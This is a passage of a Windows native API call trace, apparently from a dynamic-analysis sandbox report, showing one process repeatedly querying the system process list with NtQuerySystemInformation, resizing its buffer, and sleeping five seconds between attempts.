SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.462] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.473] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.950] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.992] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.004] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.011] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.035] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.042] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.050] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.064] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, 